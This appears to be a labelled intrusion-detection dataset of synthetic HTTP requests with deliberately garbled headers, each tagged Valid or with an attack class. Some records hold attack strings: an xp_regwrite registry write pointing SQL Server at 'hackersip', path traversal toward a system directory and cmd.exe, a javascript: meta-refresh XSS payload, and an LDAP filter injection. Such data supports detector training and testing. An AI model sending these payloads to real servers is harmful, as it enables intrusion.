If-Range: "BXjIK2YOX8DrfgrZa_m"
Max-Forwards: 701
MIME-Version: 8.8
Pragma: no-cache
Proxy-Authorization: gsrht ssipEath=ehuMx69
Authorization: NTLM dGFVdHJzY2RNZm5hbWV3ZWJwcGVlZXQ4bk1laXRnb25yZDljUGZ1Y29j
Range: -2819,9615-,773-980
Referer: /nEslm/irct/c0tTst/eogtOdk7.aspx
TE: gzip,chunked;q=0.6
Trailer: Warning
User-Agent: Mozilla/7.7 (Windows; U; Win 9x 7.7; en-be; rv:3.1.8) Gecko/21082474
UA-CPU: Sparc
UA-Disp: 312,8343,32
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 6579x971
Via: HTTP/9.4 239.64.217.43
Transfer-Encoding: gzip
Upgrade: Oce/9.1, a2s/1.1, m5nav/1.5
Warning: 156 www.jtin.shtml "qiecneTruG2dr" "Sun, 11 Apr 04 05:23:25 UTC"
X-Forwarded-For: 195.76.247.208
X-Serial-Number: 0742335633125
----: -----------------
~~~~~: ~~~~~~~~~~~~~~

eniiegmgo5=6ty/n&zoO2wnpsrAabcx=aJaJB7Q&osexo3f=03495135&uib=ne :8hh&cnelldE5sRrta=98314&1n_g=53539402&hByialqosn6yohm=4502189&Se5rsmueO=tb4LpgRgtiaw&Fn8b4ib5iEgilhT=n6ZGA3ObhKOB&lehtte2n1htnji=access_loghvbscript$

End - Id: 5330
Start - Id: 32816
class: Valid
PUT /oVT0HgMjgA/4LxjYcqe7hYbp.png? HTTP/1.1
Content-Length: 61
Content-Language: rnlpoeh,eNl
Content-Encoding: compress
Content-Location: /2nMI/ednwohha.fgf
Content-MD5: bmU3bTBsazVkZTM4SHpoZQ==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 21 Sep 07 23:22:17 GMT
Last-Modified: Tue, 24 Feb 04 11:40:44 GMT
Host: 240.196.192.164
Connection: close
Accept: */*
Accept-Charset: *;q=0.6
Accept-Encoding: *;q=0.1
Accept-Language: s-ibt;q=0.8, umnb-tsreery;q=0.8, uahAt-akEhm3di, a1trhj-egY6r;q=0.7, nu-rn;q=0.0
Cache-Control: min-fresh=6
Client-ip: 238.106.183.32
Cookie: dtoNiO9e= (t;ongeuedeXsecs=eUm03E
Cookie2: $Version="8"
Date: Sat, 21 Aug 04 05:38:18 CET
ETag: W/".QtxPGE4lSx8Y-LsbHM"
Expect: nArhhaaI=snlrmioc
From: ci0lcoo@or8ttw.ch
If-Modified-Since: Fri, 26 Aug 05 24:43:24 CET
If-Unmodified-Since: Thu, 11 Feb 10 24:53:59 UTC
If-Match: "tfG0XH.MBv.gsw1ZFhz"
If-None-Match: "k34nK@hbX0Aop1K@"
If-Range: *
Max-Forwards: 9
MIME-Version: 0.8
Pragma: dde7o=enI
Proxy-Authorization: Basic anF0emVhb3I6U2lnbnhk
Authorization: nKovm6 eyvac=rpeonut
Range: -92,-97
Referer: http://a6sw2i.de/Racht/iS8Ot.tiff
TE: chunked,deflate,chunked
Trailer: Accept
User-Agent: Mozilla/1.6 (Machintosh; U; Mac OS X 8.3; 7m-st; rv:3.8.3) Gecko/45067393
UA-CPU: x86
UA-Disp: 2397,8345,8
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 504x3649
Via: 8.2 206.208.239.154, 2.7 www.x5c9hpn.js, Euy2/5.6 117.88.224.181:1831
Transfer-Encoding: deflate
Upgrade: a1gnfr/1.8, dT1/0.1
Warning: 045 www.elolydv.png "pbietttuaolq" "Sat, 01 Sep 07 19:08:20 UTC"
X-Forwarded-For: 149.185.179.218
X-Serial-Number: 6352677
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

oodtopttwc=h0C&ur=cia>nemopenz h&srIa=0&to=l3e&4Q=267908716

End - Id: 32816
Start - Id: 31509
class: Valid
GET /n.SOz8yhuTQv-LgXt.bin?TAmStNr3Dg=tn+ya%3EOir3ee&nQ7JSm=snhzp&xotlj=eq&tepixF8=0287357&sTnnl7e=r6NwoNKml%401&tmet9efteif=xwsba&21A2ywedvhgiser=rrLVtzmsM HTTP/1.0
Host: 104.152.5.150
Connection: close
Accept: */*;q=0.1
Accept-Charset: *;q=0.1
Accept-Encoding: *
Accept-Language: *;q=0.0
Cache-Control: only-if-cached
Client-ip: 252.75.180.242
Cookie: rrdbztlt4T=scriptdrW
Cookie2: $Version="05"
Date: Fri, 19 May 06 23:40:40 GMT
ETag: W/"aY1o9kYc6m8I8Bg-8hU"
Expect: 100-continue
From: hsiOlt@xdxec0.fr
If-Modified-Since: Sat, 09 Oct 04 13:32:59 GMT
If-Unmodified-Since: Mon, 30 Nov 09 06:50:52 CET
If-Match: "AV7g9odkjuOOOWkYQ1O"
If-None-Match: "Njbqx3RzKG9tB.wey"
If-Range: Wed, 20 Oct 04 18:46:08 GMT
Max-Forwards: 6211
MIME-Version: 6.4
Pragma: 9mkaA=et
Proxy-Authorization: Digest nonce
Authorization: Digest opaque="giu2ra"
Range: -89812,-061835,42050-159934
Referer: /dd4iqts8/Oyft/o7wsdt8t/bO1tochS/dooln.bin
TE: chunked,gzip
Trailer: Max-Forwards
User-Agent: Mozilla/4.2 (compatible; MSIE 2.2; Windows NT; NlauH2i; leeimo8; shhdpkdpu3)
UA-CPU: Sparc
UA-Disp: 254,5965,16
UA-OS: Win95
UA-Color: color32
UA-Pixels: 484x1465
Via: 4.4 244.212.144.127, 1.0 www.grfc4.jpg, 9.9 71.172.203.142
Transfer-Encoding: fo4u; ehu5t=nnAnesm
Upgrade: eb9wts/3.1
Warning: 187 www.tdwd.js "edymttrish6s2ehurma" "Thu, 12 Mar 09 02:19:38 GMT"
X-Forwarded-For: 41.171.103.8
X-Serial-Number: 5515370509152
----: --------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 31509
Start - Id: 13598
class: Valid
GET /EoT4ntmp3VpassthrukB1MRl/eJA4NmGZ8Q4wgw3uSDbp/cNo09o.jpeg?inhLyoeOj=shtpass&x8esrtHioriseic=xXlDl7ijvXHF&oeptoeonceh=oGc&ne4mhr=%3Ca HTTP/1.0
Host: www.aralies.fr
Connection: keep-alive
Accept: application/x-tar, audio/x-wav;q=0.5, application/*
Accept-Charset: windows-1255, x-mac-japanese;q=0.2
Accept-Encoding: 
Accept-Language: oTi-tfgtorjR, ox7-TmXtg;q=0.2, a-cvr, gnaailvg-nsiIi
Cache-Control: min-fresh=3
Client-ip: 161.199.57.174
Cookie: elMgell=49tqan9p]lin
Cookie2: $Version="845"
Date: Sun, 03 Feb 08 17:11:39 CET
ETag: "rVv4SwDeM6OGGf6"
Expect: 100-continue
From: dg0cv@iera.de
If-Modified-Since: Mon, 01 Feb 10 01:43:33 UTC
If-Unmodified-Since: Thu, 14 Aug 08 13:16:41 UTC
If-Match: "8haTkWnje2ixW1BUd90"
If-None-Match: "XYt9r1aIgp.OL8PIsJ"
If-Range: *
Max-Forwards: 1414
MIME-Version: 0.6
Pragma: TAru='eu'
Proxy-Authorization: Basic aGVtbWxxOTp5bG9ldg==
Authorization: NTLM djh2N3VoNTZuZGg3dWx0ZHNuc2tlbmVzb2Jpc3V2ZjRsbnNuZWlvb2Vs
Range: 8-93898,-3983,-5248
Referer: /eqoeeT7.dll
TE: chunked,chunked
Trailer: Pragma
User-Agent: Mozilla/4.3 (X11; U; Open BSD i586 8.6; ni-ef; rv:0.2.8) Gecko/09600485
UA-CPU: Sparc
UA-Disp: 896,6607,8
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 138x4900
Via: 5.7 www.intdtef.css
Transfer-Encoding: deflate
Upgrade: ksola/7.8, haEuhh/9.9, nrh/5.2, Dl0m/5.1
Warning: 604 www.ireeteni.js "iustbs" "Wed, 09 Sep 09 12:42:12 GMT"
X-Forwarded-For: 124.212.119.141
X-Serial-Number: 70032554284651
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 13598
Start - Id: 36398
class: OsCommanding
PUT /1E1k/3rz/ii/ayfsEzwKHhLkrSY1/yV.SU@tx@.gif? HTTP/1.0
Content-Length: 346
Content-Language: iseo,odA,hS
Content-Encoding: gzip
Content-Location: http://er2e.be/uapiateO/1Ceojg/reTNehmu/elddan/e9iwOn.bin
Content-MD5: bjQxcmFzU3JtT2R0YWxoag==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 02 Oct 06 07:12:18 UTC
Last-Modified: Tue, 04 May 04 19:05:06 UTC
Host: 135.226.61.208:2
Connection: M7i8
Accept: text/plain;q=0.1
Accept-Charset: *
Accept-Encoding: *
Accept-Language: r5boei-8ntera;q=0.4, wyhsd-u;q=0.5, A-orard3;q=0.1
Cache-Control: no-store
Cookie2: $Version="9"
Date: Mon, 02 Mar 09 15:17:02 GMT
Expect: 100-continue
If-Match: "Hh6PEtF.K1C-NUfURhS"
If-None-Match: *
If-Range: Mon, 26 Jun 06 01:26:36 GMT
Max-Forwards: 634
MIME-Version: 0.3
Proxy-Authorization: teg9e t2n7ead=tedeel
Authorization: nsgD h3t3hi=scbee
Range: 57553-
Referer: /wesaYc/q82h6nu/eoeoe3sq/gpeiarf6/8lio6a.swf
TE: gzip;q=0.6
User-Agent: Mozilla/6.9 (Machintosh; U; Mac OS X 5.3; wW-tc; rv:3.9.9) Gecko/67259143
Via: 7.3 155.233.215.34
Transfer-Encoding: gzip
Upgrade: rRt6/6.6

etiEb=tEeop&bf=t4xieusrZcqins&ig=L&Cbeezmta0ioAhi=femnc&dubpona1n0T4e=230451&anaeooeehRhh=712&wget8WWbn_4v=133&i7tgto1riE=t3aMojDxn&5eiR=exec  xp_regwrite    'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\MSSQLServer\Client\ConnectTo','tlehltb','REG_SZ','DBMSSOCN,hackersip,80'&gR@7w1=rUrsehnc&Si=4&lLac=iP2GBlfW

End - Id: 36398
Start - Id: 34986
class: Valid
POST /fTe/nLa37/uEqfearhedatk2/8mnph-DA1ZhFxAk/tecdIfsaerdgedIrAA.php4? HTTP/1.0
Content-Length: 257
Content-Language: 9,HicsxOd
Content-Encoding: deflate
Content-Location: /ilgnjoS/eo2lcAm.tar
Content-MD5: dHJ0dHllZ2JjbXJkbmZndQ==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 15 Sep 06 22:19:13 CET
Last-Modified: Sun, 14 Jun 09 20:03:48 UTC
Host: www.susdnh.org
Connection: utcodhr3
Accept: */*;q=0.4
Accept-Charset: iso-10646-ucs-2;q=0.8, utf-8;q=0.0, macintosh;q=0.0, x-mac-cyrillic;q=0.5, us-ascii;q=0.2
Accept-Encoding: compress, identity, deflate
Accept-Language: *;q=0.6
Cache-Control: Xmty='psqN'
Client-ip: 62.227.251.73
Cookie: V4boot.iniixBO.5E=v;mltxOnbj=mlh
Cookie2: $Version="223"
Date: Tue, 30 Mar 10 01:56:08 UTC
ETag: "l2Ighxfk12P6Xe4nJFN"
Expect: hxsoa3en=shlmntit
From: Jfon@lR0e.de
If-Modified-Since: Sun, 05 Apr 09 01:21:07 UTC
If-Unmodified-Since: Sun, 03 Aug 08 15:34:58 UTC
If-Match: *
If-None-Match: *
If-Range: "sQ6HAIfvae8zhwtnuUvI"
Max-Forwards: 77
MIME-Version: 5.8
Pragma: 1cl=9aelt
Proxy-Authorization: rt0shl Adopt=uaeh
Authorization: Digest nc=6AAf7bb2
Range: 364064-7831,-653,14-
Referer: http://pIgmagt0.ch/Bgpco/ltd3z/hhxi/dt10.swf
TE: trailers,trailers
Trailer: Referer
User-Agent: reuemfeaep (nRV.i2uQ8)
UA-CPU: StrongARM
UA-Disp: 797,339,32
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 1234x075
Via: HTTP/9.1 121.111.162.135:54
Transfer-Encoding: gzip
Upgrade: ku3hm/3.0, alouf/9.2
Warning: 585 242.163.219.88:39711 "liupeie" "Sat, 02 Feb 08 03:16:08 GMT"
X-Forwarded-For: 90.170.127.145
X-Serial-Number: 94870526636220285
----: ---------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

XM2log=ussnmSaocESae&2n6raidus0Oig=sLT&soue4eHh9k=3958126032&temt=h33h3&sid=54&zpOeDlocation=toeew&omOOhoeo0=ceinserteloghaouaupdatethy( rW&AselectInull=8982187&WXMnM@J7=15332136&6.uR=nmo&ee1sti=aio9 hp5TLl&ieEi3tz0=(&tlali3iertnuip=extto-bN9rCr&hr=u0ew

End - Id: 34986
Start - Id: 7664
class: Valid
PUT /tD_H3aA@Me/686HXxyIc/steeuwRytcoYhyilw3f/eeupr4ze/qJeCVHT/u2uEz3rDtp6PbIbP/nosdlut0slsutsiiI/tkaBUWKK-o/idnas2oouervmf.php? HTTP/1.0
Content-Length: 157
Content-Language: aa0h,h5oEsa,pheie
Content-Encoding: compress
Content-Location: http://rnnimtm.fr/ieonp/pw6o/iealamb9/rrigrliw.sh
Content-MD5: bG5wczRlYWZpSDJvdnloaQ==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 16 Jan 08 20:06:04 GMT
Last-Modified: Mon, 14 Jun 04 21:49:24 UTC
Host: 86.130.143.150
Connection: close
Accept: */*;q=0.4
Accept-Charset: euc-tw;q=0.8, cp-950;q=0.3, iso-8859-6;q=0.6, cp-950
Accept-Encoding: 
Accept-Language: a-j4ol, oiRoTwtr-x;q=0.0, at-a, snNo-09r, o4gahquE-nt2u;q=0.0
Cache-Control: only-if-cached
Client-ip: 41.206.202.253
Cookie: za8Gmegsu2=aez
Cookie2: $Version="1"
Date: Mon, 06 Sep 04 14:15:27 CET
ETag: W/"nwZZrkAXGQpdqZtyCF"
Expect: ge79=oeetHh
From: c3rer@Oormhttx.fr
If-Modified-Since: Sat, 10 Apr 10 03:52:31 CET
If-Unmodified-Since: Mon, 21 Apr 08 02:45:37 UTC
If-Match: *
If-None-Match: *
If-Range: Thu, 21 Oct 04 21:39:44 CET
Max-Forwards: 02
MIME-Version: 4.9
Pragma: fwi='ubtdg'
Proxy-Authorization: Basic b3A5aXJlZWw6dGZtZWVo
Authorization: Basic b242YWk6RWNhc21z
Range: 011790-
Referer: /ijaDh/Rtaiteo.tar.gz
TE: deflate
Trailer: Accept
User-Agent: Yo7retyTtt (lNkoMqJ; ttLSTgugH8; nP0BoSBjQ)
UA-CPU: 68000
UA-Disp: 319,9267,16
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 0413x678
Via: FTP/8.6 222.117.149.130
Transfer-Encoding: gzip
Upgrade: elei/3.8, uih7yT/2.2, o6nf/3.9, 8tygnz/1.0
Warning: 017 54.146.31.35 "emaeavHx" 
X-Forwarded-For: 116.49.9.190
X-Serial-Number: 117057517
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~

rOgrrnnnOing=0uDW&fholeuass2aciD=soleN)Kdc'ecspe&jtle8go=snnXoheul3t&RIQimgadminad2Jq.= &WniauO=homef&Sante=k &2ijdkzuo=a&wpoo=cif&elDnotH=6midfhaSortane

End - Id: 7664
Start - Id: 45566
class: PathTransversal
GET /7wp-K.css?oib=17294&edrllbgeatmowe=%3Eterc&a8ni3Retdes=asOz&Ni=0124&tmlre=225571&Shqc=t8d&DlogC8=sd&BD_jGPprocessing-instructionq9Er=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fusr%2Fyo.bat&Ab3cw=t0ma7epdna&alavOei=aSe HTTP/1.1
Host: 252.251.246.56
Connection: close
Accept: */*;q=0.7
Accept-Charset: windows-874, euc-tw
Accept-Encoding: *
Accept-Language: nntsshie-o;q=0.9
Cache-Control: min-fresh=0
Client-ip: 164.135.230.128
Cookie: 26ejuiimmAao=nRil'sp h%ud;AstdinallPwGinboot.iniEb=8Xip@exXl;qrpLOlhhee=taHY9YLf3t;anr6fp=08496;tiemrEBwoi=0826195030;t4elqo9=cef1nehnde8EU
Cookie2: $Version="88"
Date: Fri, 06 Jul 07 17:04:17 GMT
ETag: "IiAPylRuCsm05lJzLT"
Expect: 7Sjsoaml
From: kccnlkv2@rodignu.de
If-Modified-Since: Fri, 28 May 04 19:58:07 CET
If-Unmodified-Since: Mon, 10 Aug 09 04:12:42 UTC
If-Match: "ClOJ79aKmE72qeAOyhBb"
If-None-Match: *
If-Range: "Z@A5VKN5TR3g4pnbYeNg"
Max-Forwards: 24
MIME-Version: 9.4
Pragma: bni0ia=czmr9c
Proxy-Authorization: NTLM ZXBzeGFlbkxta3QwRGRkcnB5YXBtcTBGbmU4YXJuY2FpTjhkaGx0
Authorization: Digest nonce
Range: -2
Referer: /v2aS/Dorehrn/ntnh/hnFta/phpenem.jpg
TE: deflate,gzip;q=0.2,gzip;q=0.7
Trailer: Upgrade
User-Agent: Mozilla/0.9 (Windows; U; Win 9x 6.5; d7-oa; rv:9.4.0) Gecko/97815571
UA-CPU: StrongARM
UA-Disp: 6548,353,8
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 220x9820
Via: 5.6 20.210.5.114
Transfer-Encoding: compress
Upgrade: ggC/2.3, d2sU/5.6, shIm/3.2, ehs/6.3
Warning: 278 227.248.46.198:699 "ihqt4i1" "Mon, 16 Jul 07 06:16:16 UTC"
X-Forwarded-For: 64.169.57.223
X-Serial-Number: 86157391207979195
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45566
Start - Id: 11556
class: Valid
GET /aeEpAaZqisKcM.WIV/oiahloh1aa/ipcl5jWB4b/R3Wuvbscriptalllg4_s..css?pa=eat&rdu8daeec=1454&nam=7&gg17oethi=otRniYocwtZ&6NselhdiiohH=27 HTTP/1.1
Host: 230.5.57.71:80
Connection: keep-alive
Accept: image/*, application/zip, video/quicktime;q=0.3
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *;q=0.4
Cache-Control: only-if-cached
Client-ip: 20.170.229.99
Cookie: 1S3A4r=0598;ehdi3ers=765
Cookie2: $Version="8"
Date: Mon, 05 Jul 04 23:01:05 GMT
ETag: "6kKejnXPOeRQZgBYU6o"
Expect: i8lao=uUso;tnogrho=e0amF
From: nikAlis@eeus.com
If-Modified-Since: Sat, 09 Aug 08 09:04:31 CET
If-Unmodified-Since: Fri, 13 Apr 07 13:20:23 CET
If-Match: *
If-None-Match: "LVWFMdsD9s1gCKlu"
If-Range: "FotIECYv8jgAkK9AW.8r"
Max-Forwards: 918
MIME-Version: 5.9
Pragma: ae='h'
Proxy-Authorization: Basic bHRpaHI6dGFIZVdvbA==
Authorization: Basic dGFtczp0NTJycmE0
Range: -2101,69-6729,647249-
Referer: /gheoheo.doc
TE: deflate
Trailer: Referer
User-Agent: sjchs/4.8.2
UA-CPU: 68000
UA-Disp: 714,2257,16
UA-OS: Win9x
UA-Color: color32
UA-Pixels: 827x168
Via: Uoe/5.4 www.jq12o.htm
Transfer-Encoding: gzip
Upgrade: tvETi/0.6, gElm/7.0
Warning: 828 www.oeaq.js "rh1edueewtoca" "Sat, 05 Dec 09 16:04:50 GMT"
X-Forwarded-For: 175.39.106.169
X-Serial-Number: 24189
----: -----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 11556
Start - Id: 46922
class: XSS
PUT /rCn1Uc@/Pf/iabMhcTMDnNgUrv/ixNml3XXYvp1k/ep@VFOSALBmg/6pbebchddt/insertJWDY.cfm? HTTP/1.0
Content-Length: 369
Content-Language: 8eEl
Content-Encoding: deflate
Content-Location: /45teac/tcsttfeg.pdf
Content-MD5: aTB0bGRldW9udHR0NmhlMw==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 25 Aug 07 16:52:41 GMT
Last-Modified: Thu, 09 Mar 06 03:45:20 CET
Host: www.lmsy.ch:80
Connection: q3xiejma
Accept: video/quicktime;q=0.8, text/*
Accept-Charset: *;q=0.2
Accept-Encoding: deflate, gzip;q=0.6, gzip, identity, gzip;q=0.8
Accept-Language: *
Cache-Control: max-stale=941
Client-ip: 99.107.245.11
Cookie: sicTsl=075054;ao1rsooion=tdoa>;.BDB0_echo=ewn6ntxpzoqda;eo5fs3t=80296852;iAonnn=rDjkRB;hpaktwnItna=e1C5m62lIPJe
Cookie2: $Version="1"
Date: Tue, 15 Sep 09 15:56:46 UTC
ETag: W/"8gCraCWHramfcOb-S0.p"
Expect: 100-continue
From: HsznrM@xmaxp.fr
If-Modified-Since: Tue, 06 Nov 07 18:09:18 UTC
If-Unmodified-Since: Fri, 08 Oct 04 09:04:22 UTC
If-Match: *
If-None-Match: *
If-Range: Sat, 16 Jan 10 13:23:59 CET
Max-Forwards: 3
MIME-Version: 9.1
Pragma: oaci=stenrra3
Proxy-Authorization: NTLM Y2NlbUFhZmIzc3JobmUwMm14bGVyZWlpbWk4eGVUZzJocmVodGluRWl4aXRuaVo=
Authorization: NTLM aWxWNWxhd2h0b3VpYXRhamVldHRzZGFjYWV0aG5zaHFlaG1venFkaW03bg==
Range: -790
Referer: http://www.buycEl.de/aiqws/un53ibof/suh8/n4ohf9t/ngwni.png
TE: chunked;q=0.1
Trailer: Accept-Encoding
User-Agent: itssslT/9.5
UA-CPU: MIPS
UA-Disp: 2330,130,8
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 537x7894
Via: 5.6 30.229.92.116:976, uhptG/9.5 245.142.8.51, awe3e/8.4 49.110.174.190:5745
Transfer-Encoding: tkr6ic; asyxqwye=ooat
Upgrade: sdW/7.9, agrd/5.9, wt6wa9/7.2
Warning: 749 124.119.94.150:741 "rcapb76l7ke" "Tue, 13 Dec 05 01:19:14 GMT"
X-Forwarded-For: 59.28.178.137
X-Serial-Number: 3374825125599046
----: ---------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

au69EndaGst=5111&ermble=M01Ndycaimir&JIgj_bUJboot.ininph-7@=eeOq3y3hesdjiiiatt&sd40kj=6c'o&irqcxgnnenpeeCi=hce&rditdnzHiIlx=a@2cKv&3I3Jpb=e8oF_GD&8y=12&xmlprocessing-instructionFscriptp=06&nen=<meta  http-equiv =   "   refresh     "  content   = " 0;url=javascript:   [alert   ('soiscebsra');]     ">&hSmeatn8ittol=i9aa0cqets5re4

End - Id: 46922
Start - Id: 20216
class: Valid
GET /U@zUBcunion3/jje1abhRE/FFkREUMn02Dx/taidcSd5Ie/rs0odvntd3dywsqeecr/oantsodOqeRE/o355I8/vlocationfrom.d3/1WyCS-NLVkT.92gdSxsG.asmx?rgceuisriEumt=iles&68tehlsfHi=15&dueosh=oeegoeaMea&dt=enojdbsamryhts&3uit0lnrrt68o=i%3C&oN7b=iViXfMU_xQ&ceueLmzsrz=4411382&nonf=eiret0fus&Oe8xiaei=03736&styleSupdateI=iu9tnsi9o HTTP/1.1
Host: 144.236.202.41
Connection: close
Accept: video/quicktime;q=0.5, video/quicktime;q=0.1, application/*
Accept-Charset: iso-8859-4, iso-8859-4, koi8;q=0.5, isiri-3342, iso-8859-7
Accept-Encoding: *
Accept-Language: *
Cache-Control: no-cache
Client-ip: 60.188.156.198
Cookie: tah1e3sasei0q=337;bEpg7var3o22o=e;u9vome=i6okRF07
Cookie2: $Version="15"
Date: Fri, 15 Jan 10 21:50:19 GMT
ETag: "jcgM-YCpMRMKRXDm2@"
Expect: awrrh3m
From: sreedvjt@7letb.de
If-Modified-Since: Thu, 30 Mar 06 16:03:01 UTC
If-Unmodified-Since: Wed, 09 Mar 05 05:29:18 GMT
If-Match: *
If-None-Match: "SidUlw1@889BbZ5tPR"
If-Range: "PpyxQT_IO1m9OEn-ewA"
Max-Forwards: 7
MIME-Version: 0.1
Pragma: teeEa='aohuehrh'
Proxy-Authorization: Digest username="lseoiae3"
Authorization: Basic ODNyajoybGhueXFvbw==
Range: 8-0,-1872,-4
Referer: http://uaicdhel.fr/5sncsmnw.rar
TE: trailers,deflate;q=0.3,trailers
Trailer: Date
User-Agent: Mozilla/9.8 (compatible; MSIE 5.8; SunOS sun4u; o1et)
UA-CPU: 68000
UA-Disp: 7522,1953,8
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 4940x047
Via: hadeht/7.1 www.tdnc7.gif, 9.8 217.21.185.113
Transfer-Encoding: identity
Upgrade: ehild/2.2, sbuaee/6.5, o2oe/9.8, eape/2.8
Warning: 396 www.etsot.png "nrlge3atrzigrleagne" "Tue, 20 Nov 07 19:17:59 GMT"
X-Forwarded-For: 43.1.107.121
X-Serial-Number: 554046996797250
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 20216
Start - Id: 36443
class: OsCommanding
GET /file.bat/..��..��..��winnt/system32/cmd.exe/c dir C:georgi.asp/..��..��..��file.ext? HTTP/1.0
Host: 46.89.204.146
Connection: close
Accept: */*
Accept-Charset: cp-936, x-mac-japanese;q=0.8, utf-7, iso-8859-8-i
Accept-Encoding: gzip;q=0.4, identity;q=0.0, gzip;q=0.9, gzip, deflate;q=0.9
Accept-Language: oI-nE, sstyj-fod;q=0.6
Cache-Control: max-age=5
Client-ip: 253.249.181.175
Cookie: nts=fno;a9nn=w1
Cookie2: $Version="10"
Date: Sun, 19 Feb 06 06:23:39 GMT
ETag: W/"u4HtIBSrU_SJ2Q3p6Q"
Expect: ajatsei7=hn7Hs
From: ghijiO@Fsrajafric.com
If-Modified-Since: Tue, 03 Jan 06 20:32:04 CET
If-Unmodified-Since: Sat, 28 May 05 14:28:11 CET
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 1615
MIME-Version: 0.7
Pragma: c2fqred=Ddnj
Authorization: esyEx nttyicer=syse
Range: 18-43314
Referer: /Onsteifo/ei0nio.php3
TE: deflate,trailers,chunked;q=0.8
Trailer: Trailer
User-Agent: Mozilla/0.8 (Machintosh; U; Mac OS X 7.0; a8-iH; rv:8.8.2) Gecko/87385162
UA-CPU: PowerPC
UA-Disp: 5073,578,16
UA-Color: color32
UA-Pixels: 006x6469
Via: 9.7 www.wtmnbFs.htm, Iot8a/9.0 www.emhoxf.jpeg, FTP/7.8 4.87.94.39:7108
Transfer-Encoding: gzip
Warning: 176 3.53.123.242 "nltteLtvtattssrC" 
X-Forwarded-For: 92.128.39.126

null

End - Id: 36443
Start - Id: 38290
class: LdapInjection
GET /a3/tI_EjD50Wsoylg.DB/7dk.shtml?rtg4s2sea=hnnt%29%28%26%28objectClass+++%3D+pnTj*%29&g7qedtn1ti8Rv=eeEtor&qze=E9ripositionaa9ihttpmwm&ernrtdite=2555379194&abdlAs0nmLte=605482 HTTP/1.0
Host: www.r9acEeya.be
Connection: hoha
Accept: text/*;q=0.5, audio/x-wav;q=0.4, audio/*;q=0.6
Accept-Charset: x-mac-korean;q=0.2, utf-8;q=0.1
Accept-Encoding: 
Accept-Language: ru-Os, stztj-ygkms8
Cache-Control: max-age=69
Client-ip: 166.82.60.199
Cookie: ghysawinmg=7;roC2om-7mBn.=6xGUa;illHaiduyhyamat=t?ri;ok5ro1t7esGv=8nE;a0yAd=hbij0e0ew7Oe7rsiap
Cookie2: $Version="436"
Date: Wed, 01 Aug 07 23:41:29 GMT
ETag: W/"Bq3JVGm2RGFCrlvj"
Expect: 100-continue
From: deosTn4@ntarwtzGa.ch
If-Modified-Since: Sun, 23 Dec 07 09:59:28 GMT
If-Unmodified-Since: Fri, 20 Jun 08 21:41:19 CET
If-Match: "ET@jdlgsXoHJHvB"
If-None-Match: "6-q2N90f9zcQjfY"
If-Range: Fri, 31 Oct 08 03:59:05 GMT
Max-Forwards: 7767
MIME-Version: 5.0
Pragma: asA=nc6s3o
Proxy-Authorization: Digest username="xipatefi"
Authorization: Basic c21lZXJFaTp5b25haEVN
Range: 31-925,787-954702
Referer: http://nnsejat.it/lpfanE3a/stnr/5tem/Th3wrd.swf
TE: trailers,trailers
Trailer: Proxy-Authorization
User-Agent: Mozilla/8.0 (compatible; MSIE 9.7; Win98; eaed7e; letoteNA)
UA-CPU: MIPS
UA-Disp: 059,0810,8
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 205x286
Via: 8.4 www.5foeno.html:3, HTTP/0.6 157.33.222.250, FTP/1.5 www.kAder.html:511
Transfer-Encoding: deflate
Upgrade: segoo/3.8
Warning: 579 www.htehr.shtml:7460 "fyeYeyiN4nSSEx4" 
X-Forwarded-For: 20.129.147.18
X-Serial-Number: 055236562928
----: --------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38290
Start - Id: 34264
class: Valid
PUT /bbteae7aA/l9QY1Gv3Vw9J_g1IPw/ni/lJ@2G/KgxesaOne/xodm/ottloybrk/isoalqtrmv8aki0qigs/oMCR/uDHzD9g-HGguof6/xS6q.jpg? HTTP/1.1
Content-Length: 285
Content-Language: aecd,rye03seV
Content-Encoding: gzip
Content-Location: /tmvecag/nloilorg.pl
Content-MD5: dDdtcmVsdGVzbklhYTZzcw==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 22 Dec 04 01:36:26 GMT
Last-Modified: Sat, 17 Sep 05 08:01:20 GMT
Host: 80.139.254.143
Connection: close
Accept: text/plain;q=0.5, text/*
Accept-Charset: *
Accept-Encoding: compress;q=0.7, gzip, deflate;q=0.4, gzip;q=0.6
Accept-Language: *;q=0.8
Cache-Control: no-store
Client-ip: 203.243.153.73
Cookie: epdeo67bthgr=itt;aS7xo=ueibrvt3i1rae3nsdk;oahn4ehasc=0;bnSt1mqHettyueh=ltsoaducedf0oeVr;vdwie=t:7re7&oth7cij
Cookie2: $Version="28"
Date: Sat, 13 Mar 10 06:32:08 UTC
